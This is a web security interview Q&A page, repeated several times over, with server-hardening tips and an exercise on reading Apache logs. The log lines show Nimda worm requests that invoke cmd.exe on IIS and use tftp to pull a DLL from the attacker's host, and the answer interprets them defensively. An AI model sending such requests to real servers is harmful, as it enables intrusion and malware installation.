What are the most important steps you would recommend for securing a new web server? Web application - Goal of question Once again, there is no right or wrong answer, however we are interested in what the applicant views as important. Web Server Security: * Update/Patch the web server software * Minimize the server functionality disable extra modules * Delete default data/scripts * Increase logging verboseness * Update Permissions/Ownership of files Web Application Security: * Make sure Input Validation is enforced within the code - Security QA testing * Configured to display generic error messages * Implement a software security policy * Remove or protect hidden files and directories Advanced Level Questions 1. Imagine that we are running an Apache reverse proxy server and one of the servers we are proxy for is a Windows IIS server. What does the log entry suggest has happened? What would you do in response to this entry? 68.48.142.117 - - [09/Mar/2004:22:22:57 -0500] "GET /c/winnt/system32/ cmd.exe?/c+dir HTTP/1.0" 200 566 "-" "-" 68.48.142.117 - - [09/Mar/2004:22:23:48 -0500] "GET /c/winnt/system32/ cmd.exe?/c+tftp%20-%2068.48.142.117%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 566 "-" "-" Goal of question To see if the applicant is fluent at reading web server log files in the Common Log Format (CLF). In this scenario, the client system (68.48.142.117) is infected with the Nimda worm. These requests will not affect our Apache proxy server since this is a Microsoft vulnerability. While it does not impact Apache, the logs do indicate that the initial request was successful (status code of 200). The Nimda worm will only send the level 2 request (trying to use Trivial FTP to infect the target) if the initial request is successful. Depending on the exact proxying rules in place, it would be a good idea to inspect the internal IIS server to verify that it has not been compromised. - Web Security Interview Questions and Answers

CoolInterview.com - World's Largest Collection of Interview Questions & Answers, FAQs, queries, sample papers, exam papers, dumps, what, why, how, where, when questions

OneStopTesting.com - Testing EBooks, Tutorials, Articles, Jobs, Training Institutes etc.
OneStopGate.com - Gate EBooks, Tutorials, Articles, FAQs, Jobs, Training Institutes etc.
OneStopMBA.com - MBA EBooks, Tutorials, Articles, FAQs, Jobs, Training Institutes etc.
OneStopIAS.com - IAS EBooks, Tutorials, Articles, FAQs, Jobs, Training Institutes etc.
OneStopSAP.com - SAP EBooks, Tutorials, Articles, FAQs, Jobs, Training Institutes etc.
OneStopGRE.com - of GRE EBooks, Tutorials, Articles, FAQs, Jobs, Training Institutes etc.

Sponsored Links

Interview Questions

INTERVIEW QUESTIONS

WEB

WEB SECURITY

DETAILS

Question: What are the most important steps you would recommend for securing a new web server? Web application?

Answer: Goal of question Once again, there is no right or wrong answer, however we are interested in what the applicant views as important.

Web Server Security:
* Update/Patch the web server software
* Minimize the server functionality disable extra modules
* Delete default data/scripts
* Increase logging verboseness
* Update Permissions/Ownership of files

Web Application Security:
* Make sure Input Validation is enforced within the code - Security QA testing
* Configured to display generic error messages
* Implement a software security policy
* Remove or protect hidden files and directories

Advanced Level Questions

1. Imagine that we are running an Apache reverse proxy server and one of the servers we are proxy for is a Windows IIS server. What does the log entry suggest has happened? What would you do in response to this entry?

68.48.142.117 - - [09/Mar/2004:22:22:57 -0500] "GET /c/winnt/system32/ cmd.exe?/c+dir HTTP/1.0" 200 566 "-" "-"
68.48.142.117 - - [09/Mar/2004:22:23:48 -0500] "GET /c/winnt/system32/ cmd.exe?/c+tftp%20-%2068.48.142.117%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 566 "-" "-"

Goal of question To see if the applicant is fluent at reading web server log files in the Common Log Format (CLF). In this scenario, the client system (68.48.142.117) is infected with the Nimda worm. These requests will not affect our Apache proxy server since this is a Microsoft vulnerability. While it does not impact Apache, the logs do indicate that the initial request was successful (status code of 200). The Nimda worm will only send the level 2 request (trying to use Trivial FTP to infect the target) if the initial request is successful. Depending on the exact proxying rules in place, it would be a good idea to inspect the internal IIS server to verify that it has not been compromised.

Category	Web Security Interview Questions & Answers - Exam Mode / Learning Mode
Rating	(0.2) By 7168 users
Added on	9/3/2014
Views	70884
Rate it!

Question: What are the most important steps you would recommend for securing a new web server? Web application?

Answer:

Goal of question Once again, there is no right or wrong answer, however we are interested in what the applicant views as important.

Web Server Security:
* Update/Patch the web server software
* Minimize the server functionality disable extra modules
* Delete default data/scripts
* Increase logging verboseness
* Update Permissions/Ownership of files

Web Application Security:
* Make sure Input Validation is enforced within the code - Security QA testing
* Configured to display generic error messages
* Implement a software security policy
* Remove or protect hidden files and directories

Advanced Level Questions

1. Imagine that we are running an Apache reverse proxy server and one of the servers we are proxy for is a Windows IIS server. What does the log entry suggest has happened? What would you do in response to this entry?

68.48.142.117 - - [09/Mar/2004:22:22:57 -0500] "GET /c/winnt/system32/ cmd.exe?/c+dir HTTP/1.0" 200 566 "-" "-"
68.48.142.117 - - [09/Mar/2004:22:23:48 -0500] "GET /c/winnt/system32/ cmd.exe?/c+tftp%20-%2068.48.142.117%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 566 "-" "-"

Goal of question To see if the applicant is fluent at reading web server log files in the Common Log Format (CLF). In this scenario, the client system (68.48.142.117) is infected with the Nimda worm. These requests will not affect our Apache proxy server since this is a Microsoft vulnerability. While it does not impact Apache, the logs do indicate that the initial request was successful (status code of 200). The Nimda worm will only send the level 2 request (trying to use Trivial FTP to infect the target) if the initial request is successful. Depending on the exact proxying rules in place, it would be a good idea to inspect the internal IIS server to verify that it has not been compromised.
Source: CoolInterview.com

If you have the better answer, then send it to us. We will display your answer after the approval.

Rules to Post Answers in CoolInterview.com:-

There should not be any Spelling Mistakes.

There should not be any Gramatical Errors.

Answers must not contain any bad words.

Answers should not be the repeat of same answer, already approved.

Answer should be complete in itself.

	Related Questions	View Answer
	What is your definition of the term "Cross-Site Scripting"? What is the potential impact to servers and clients?	View Answer
	What do you see as challenges to successfully deploying/monitoring web intrusion detection?	View Answer
	What online resources do you use to keep abreast of web security issues? Can you give an example of a recent web security vulnerability or threat?	View Answer
	What do you see as the most critical and current threats effecting Internet accessible websites?	View Answer

Please Note: We keep on updating better answers to this site. In case you are looking for Jobs, Pls Click Here Vyoms.com - Best Freshers & Experienced Jobs Website.

View All Web Security Interview Questions & Answers - Exam Mode / Learning Mode